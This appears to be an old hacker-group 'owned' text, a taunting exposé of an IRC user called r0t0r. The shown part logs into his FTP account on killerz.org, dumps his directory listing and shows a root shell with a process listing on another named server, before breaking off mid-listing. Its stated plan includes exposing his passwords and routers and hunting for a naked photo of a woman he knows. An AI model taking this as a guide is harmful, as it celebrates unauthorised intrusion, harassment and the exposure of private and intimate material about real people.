_______ _______ _________ _______ _______ ( ____ )( __ )\__ __/( __ )( ____ ) | ( )|| ( ) | ) ( | ( ) || ( )| | (____)|| | / | | | | | / || (____)| | __)| (/ /) | | | | (/ /) || __) | (\ ( | / | | | | | / | || (\ ( | ) \ \__| (__) | | | | (__) || ) \ \__ |/ \__/(_______) )_( (_______)|/ \__/ _______ GOT _ _______ ______ ( __ )|\ /|( ( /|( ____ \( __ \ | ( ) || ) ( || \ ( || ( \/| ( \ ) | | / || | _ | || \ | || (__ | | ) | | (/ /) || |( )| || (\ \) || __) | | | | | / | || || || || | \ || ( | | ) | | (__) || () () || ) \ || (____/\| (__/ ) (_______)(_______)|/ )_)(_______/(______/ This little kid has been pissing off way to many people lately. Time to put this to an end. ################################################################### [1] r0t0r info [2] Checklist [3] Killerz.org gets owned [4] matts.homeunix.net owned [5] Logs of r0t0r making an ass out of himself [6] r0t0r's roots, ciscos and passwords! =) [7] KC and the sunshine band (Ok that was bad..) [8] Conclusion ################################################################### [1] This little kid wages stupid IRC wars and thinks he is leet just because he can DoS attack. No skills, no maners and no brain. Im amazed that nobody has owned this kid before, after all he is the most pathetic loud mouth little junkie that you can find on IRC. Well.. maybe not but he is pretty pathetic. [2] r0t0r Check list 1. Own killerz 2. Own matts.homeunix.net 3. Find more shells and own them 4. Expose rotor as a fake and a drunk 5. Expose r0t0rs lame roots 6. Find his cisco's which he uses to DoS people 7. Get his passwords and see if I can find a naked pic of that girl he is messing around with. I guess thats it for now. Lets get started [3] He used to own "www.killerz.org" until that got taken over by #obs / nesa / others(?) But anyways.. lets log in and see what the dude has shall we? =) $ ftp killerz.org Connected to killerz.org (69.50.184.178). 220---------- Welcome to Pure-FTPd [TLS] ---------- 220-You are user number 3 of 50 allowed. 220-Local time is now 14:59. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. Name (killerz.org:root): killerz 331 User killerz OK. Password required Password: 230-User killerz has group access to: killerz 230 OK. Current restricted directory is / Remote system type is UNIX. Using binary mode to transfer files. ftp> ls * 227 Entering Passive Mode (69,50,184,178,38,41) 150 Accepted data connection -rw-r--r-- 1 32479 killerz 196079 Jan 13 01:17 FreeBSD.png -rw-r--r-- 1 32479 killerz 2577 Jan 3 21:06 index.html -rw-r--r-- 1 32479 killerz 1383 Mar 26 03:43 kscan.c code: drwxr-xr-x 2 32479 killerz 4096 Dec 19 19:07 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. -rw-r--r-- 1 32479 killerz 507 Dec 19 19:07 coolPHP.txt etc: drwxr-x--- 3 32479 12 4096 Dec 17 13:09 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. -rw-r--r-- 1 32479 killerz 0 Dec 17 13:00 .imapv4cp5c -rw-r--r-- 1 32479 killerz 0 Dec 17 13:09 ftpquota drwxr-x--- 2 32479 12 4096 Mar 28 01:29 killerz.org mail: drwxrwx--- 3 32479 12 4096 Apr 6 07:57 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. -rw-rw---- 1 32479 12 508 Jan 9 18:54 INBOX.Drafts -rw-rw---- 1 32479 12 1351 Jan 9 21:14 INBOX.Sent -rw-rw---- 1 32479 12 714071 Jan 9 18:58 INBOX.Trash -rw-rw---- 1 32479 12 7203732 Apr 6 07:57 inbox drwxr-xr-x 3 32479 12 4096 Dec 17 04:19 killerz.org -rw-rw---- 1 32479 12 210853 Jan 9 18:53 neomail-trash -rw-rw---- 1 32479 12 0 Dec 19 22:38 saved-messages -rw-rw---- 1 32479 12 426549 Jan 9 18:54 sent-mail public_ftp: drwxr-xr-x 3 32479 killerz 4096 Dec 15 14:52 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:52 incoming public_html: drwxr-x--- 30 32479 99 4096 Apr 6 14:45 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. -rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess -rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD -rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png -rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html -rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg -rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf -rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons -rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php -rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2 drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck -rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images -rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc -rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt -rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt -rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music -rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit -rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay -rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin -rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics -rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz -rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c -rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d tmp: drwx------ 6 32479 killerz 4096 Dec 29 11:10 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. drwx------ 4 32479 killerz 4096 Apr 3 18:28 analog drwx------ 2 32479 killerz 4096 Apr 3 18:28 awstats -rw-r--r-- 1 32479 killerz 0 Apr 3 18:28 lastrun -rw-r--r-- 1 32479 killerz 0 Apr 4 06:48 lastrun.bw drwx------ 4 32479 killerz 4096 Apr 1 17:07 webalizer drwx------ 2 32479 killerz 4096 Mar 18 02:04 webalizerftp www: drwxr-x--- 30 32479 99 4096 Apr 6 14:45 . drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 .. -rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess -rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD -rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png -rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html -rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg -rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf -rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons -rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php -rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2 drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck -rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images -rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc -rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt -rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt -rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music -rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit -rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay -rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin -rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics -rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz -rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c -rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d ## Well.. ftp access is good and all... but I want more root@panther [/root]# uname -a; id Linux panther.unixbsd.info 2.6.10-grsec #2 Sun Jan 9 16:59:21 PST 2005 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=XXXX(XXXXXXXXX) ## There we go! :) root@panther [/tmp]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1540 500 ? S Apr04 0:06 init [3] root 2 0.0 0.0 0 0 ? SWN Apr04 0:02 [ksoftirqd/0] root 3 0.0 0.0 0 0 ? SW< Apr04 0:00 [events/0] root 4 0.0 0.0 0 0 ? SW< Apr04 0:00 [khelper] root 22 0.0 0.0 0 0 ? SW< Apr04 0:13 [kblockd/0] root 52 0.0 0.0 0 0 ? SW Apr04 0:00 [kapmd] root 72 0.0 0.0 0 0 ? SW Apr04 0:00 [pdflush] root 75 0.0 0.0 0 0 ? SW< Apr04 0:00 [aio/0] root 74 0.0 0.0 0 0 ? SW Apr04 0:54 [kswapd0] root 662 0.0 0.0 0 0 ? SW Apr04 0:00 [kseriod] root 767 0.0 0.0 0 0 ? SW Apr04 2:44 [kjournald] root 1565 0.0 0.0 0 0 ? SW Apr04 0:00 [kjournald] root 1911 0.0 0.0 0 0 ? SW Apr04 0:00 [khpsbpkt] root 2633 0.0 0.0 1596 572 ? S Apr04 0:52 syslogd -m 0 root 2637 0.0 0.0 1548 496 ? S Apr04 0:01 klogd -x root 2736 0.0 0.1 10516 2008 ? S Apr04 0:01 /usr/sbin/snmpd -s -l /dev/null -P /var/run/snmpd -a root 4221 0.0 0.1 8520 1380 ? S Apr04 0:00 cupsd root 4514 0.0 0.1 3668 1376 ? SN Apr04 0:11 /usr/sbin/sshd root 4559 0.0 0.0 2152 796 ? S Apr04 0:01 xinetd -stayalive -pidfile /var/run/xinetd.pid postgres 4600 0.0 0.1 10960 1708 ? S Apr04 0:00 /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data postgres 4601 0.0 0.1 10244 1472 ? S Apr04 0:00 postgres: stats buffer process postgres 4602 0.0 0.1 9252 1512 ? S Apr04 0:00 postgres: stats collector process root 4605 0.0 0.1 7024 1644 ? SN Apr04 0:07 sshd: root@pts/0 root 4626 0.0 0.1 7192 1936 ? S Apr04 0:06 chkservd root 4690 0.0 0.1 5336 1284 pts/0 S Apr04 0:00 -bash root 4724 0.2 0.7 43220 7812 ? S Apr04 13:31 /usr/sbin/clamd mailnull 4735 0.0 0.1 6636 1752 ? SN Apr04 0:22 /usr/sbin/exim -bd -q60m mailnull 4740 0.0 0.1 6636 1748 ? SN Apr04 0:00 /usr/sbin/exim -tls-on-connect -bd -oX 465 root 4746 0.0 0.1 2976 1492 ? S Apr04 4:10 antirelayd root 4754 0.0 1.6 20188 17584 ? SN Apr04 1:53 /usr/local/apache/bin/httpd -DSSL root 4762 0.0 0.3 11296 3484 ? SN Apr04 1:54 cppop - accepting on port 110 root 4844 0.0 0.1 6932 1720 ? SN Apr04 0:01 pure-ftpd (SERVER) root 4847 0.0 0.0 6672 864 ? S Apr04 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin/pureauth root 4878 0.0 0.0 1612 668 ? S Apr04 0:00 crond root 4894 0.0 0.0 5328 1028 ? S Apr04 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid xfs 4943 0.0 0.0 5100 736 ? S Apr04 0:00 xfs -droppriv -daemon mysql 4946 0.0 7.8 93980 81004 ? SN Apr04 0:36 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock daemon 4956 0.0 0.0 1592 560 ? S Apr04 0:00 /usr/sbin/atd mysql 4963 0.0 7.8 93980 81004 ? SN Apr04 0:00 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 4971 0.0 7.8 93980 81004 ? SN Apr04 1:19 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 5132 0.1 7.8 93980 81004 ? SN Apr04 6:30 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 5375 0.0 7.8 93980 81004 ? SN Apr04 5:27 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mailnull 5376 0.0 0.3 5872 3448 ? SN Apr04 0:36 /usr/bin/perl /usr/local/cpanel/bin/eximstats mysql 5377 0.1 7.8 93980 81004 ? SN Apr04 6:01 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock root 5381 0.0 0.1 9528 1968 ? S Apr04 0:16 cpsrvd - waiting for connections mysql 5395 0.0 7.8 93980 81004 ? SN Apr04 5:18 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock root 5398 0.3 6.7 77676 69432 ? SN Apr04 21:43 cpanellogd - setting up logs for vinniej mysql 5403 0.0 7.8 93980 81004 ? SN Apr04 5:19 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock root 5404 0.0 0.1 8172 1624 ? SN Apr04 0:00 cppop - accepting on port 110 nobody 5408 0.0 0.1 3444 1384 ? S Apr04 0:00 entropychat nobody 5412 0.0 0.0 1904 884 ? SN Apr04 0:00 /usr/local/cpanel/bin/startmelange cpanel 5442 0.0 0.1 36836 1888 ? SN Apr04 0:00 /usr/bin/stunnel-4.04local /usr/local/cpanel/etc/stunnel/default/stunnel.conf root 5470 0.0 0.0 1600 468 ? SN Apr04 0:00 jsvc.exec -user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out -errfile .. tomcat 5471 0.0 1.3 244916 13680 ? SN Apr04 1:43 jsvc.exec -user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out -errfile .. mailman 5476 0.0 0.2 7348 2100 ? SN Apr04 0:00 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/mailmanctl -s start mailman 5489 0.0 0.2 7176 2164 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=ArchRunner:0:1 -s mailman 5490 0.0 0.2 7136 2192 ? SN Apr04 0:09 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=BounceRunner:0:1 -s mailman 5491 0.0 0.2 7128 2112 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=CommandRunner:0:1 -s mailman 5492 0.0 0.2 7220 2164 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=IncomingRunner:0:1 -s mailman 5493 0.0 0.2 7216 2184 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=NewsRunner:0:1 -s mailman 5494 0.0 0.3 7320 4084 ? SN Apr04 0:09 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=OutgoingRunner:0:1 -s mailman 5495 0.0 0.4 7176 4308 ? SN Apr04 0:11 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=VirginRunner:0:1 -s mailman 5496 0.0 0.2 7176 2080 ? SN Apr04 0:00 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=RetryRunner:0:1 -s root 5510 0.0 0.0 1700 716 ? S Apr04 0:00 /usr/sbin/portsentry -tcp root 5531 0.0 0.0 1596 420 ? S Apr04 0:00 mdadm --monitor --scan -f root 5557 0.0 0.0 1532 400 tty1 S Apr04 0:00 /sbin/mingetty tty1 root 5558 0.0 0.0 1532 400 tty2 S Apr04 0:00 /sbin/mingetty tty2 root 5559 0.0 0.0 1532 400 tty3 S Apr04 0:00 /sbin/mingetty tty3 root 5560 0.0 0.0 1532 400 tty4 S Apr04 0:00 /sbin/mingetty tty4 root 5561 0.0 0.0 1532 400 tty5 S Apr04 0:00 /sbin/mingetty tty5 root 5562 0.0 0.0 1532 400 tty6 S Apr04 0:00 /sbin/mingetty tty6 named 6917 0.0 0.5 33080 5512 ? S Apr04 0:37 /usr/sbin/named -u named mysql 14176 0.1 7.8 93980 81004 ? SN Apr04 6:48 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 18195 0.1 7.8 93980 81004 ? SN Apr04 6:28 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 4745 0.0 7.8 93980 81004 ? SN Apr05 4:51 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 15352 0.0 7.8 93980 81004 ? SN Apr05 4:47 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 27221 0.0 7.8 93980 81004 ? SN Apr05 4:44 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 27222 0.0 7.8 93980 81004 ? SN Apr05 5:07 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 27223 0.1 7.8 93980 81004 ? SN Apr05 5:50 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 27224 0.0 7.8 93980 81004 ? SN Apr05 4:46 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 29564 0.0 7.8 93980 81004 ? SN Apr05 5:20 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 31976 0.0 7.8 93980 81004 ? SN Apr05 3:21 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 2723 0.0 7.8 93980 81004 ? SN Apr05 3:13 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock root 13889 0.0 0.0 0 0 ? SW Apr06 0:22 [pdflush] root 32694 0.0 0.2 6880 2128 ? SN Apr06 0:00 sshd: root@pts/1 root 32711 0.0 0.1 5332 1344 pts/1 S Apr06 0:00 -bash mysql 14337 0.0 7.8 93980 81004 ? SN Apr07 0:51 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14345 0.0 7.8 93980 81004 ? SN Apr07 0:54 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14349 0.0 7.8 93980 81004 ? SN Apr07 0:53 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14362 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14363 0.0 7.8 93980 81004 ? SN Apr07 0:55 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14364 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14365 0.0 7.8 93980 81004 ? SN Apr07 0:50 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14366 0.0 7.8 93980 81004 ? SN Apr07 0:51 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14367 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14388 0.0 7.8 93980 81004 ? SN Apr07 0:50 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14432 0.0 7.8 93980 81004 ? SN Apr07 0:55 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14435 0.0 7.8 93980 81004 ? SN Apr07 0:56 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14436 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14438 0.0 7.8 93980 81004 ? SN Apr07 0:54 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14439 0.0 7.8 93980 81004 ? SN Apr07 0:56 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock mysql 14440 0.0 7.8 93980 81004 ? SN Apr07 0:53 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock root 14473 0.2 0.1 5352 1432 pts/0 S Apr07 5:20 top root 13105 0.0 0.3 8100 3492 ? SN Apr07 0:00 /usr/bin/perl /usr/local/cpanel/bin/leechprotect nobody 13106 0.1 2.2 26460 22936 ? SN Apr07 1:53 /usr/local/apache/bin/httpd -DSSL nobody 13107 0.1 1.8 21436 19128 ? SN Apr07 2:12 /usr/local/apache/bin/httpd -DSSL nobody 13108 0.1 1.8 22068 19616 ? SN Apr07 2:00 /usr/local/apache/bin/httpd -DSSL nobody 13124 0.1 2.6 32388 27596 ? SN Apr07 1:58 /usr/local/apache/bin/httpd -DSSL nobody 13125 0.1 2.2 27076 23312 ? SN Apr07 1:47 /usr/local/apache/bin/httpd -DSSL nobody 13197 0.1 2.3 28160 24228 ? SN Apr07 1:56 /usr/local/apache/bin/httpd -DSSL nobody 13227 0.1 2.2 26368 22980 ? SN Apr07 2:03 /usr/local/apache/bin/httpd -DSSL nobody 13487 0.1 1.9 23524 20508 ? SN Apr07 2:08 /usr/local/apache/bin/httpd -DSSL nobody 13798 0.1 2.4 28588 25068 ? SN Apr07 1:53 /usr/local/apache/bin/httpd -DSSL nobody 13844 0.1 2.4 29248 25216 ? SN Apr07 2:07 /usr/local/apache/bin/httpd -DSSL schawo 21293 0.0 0.1 2864 1376 ? S Apr08 0:00 imapd livecart 23015 0.0 0.1 2664 1148 ? S Apr08 0:00 imapd livecart 23016 0.0 0.1 2900 1496 ? S Apr08 0:00 imapd root 26839 0.0 1.9 21956 20120 ? SN 00:41 0:00 /usr/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid --max-children=5 root 26881 0.0 2.0 23460 21712 ? SN 00:42 0:01 spamd child root 26882 0.0 2.1 23544 21792 ? SN 00:42 0:01 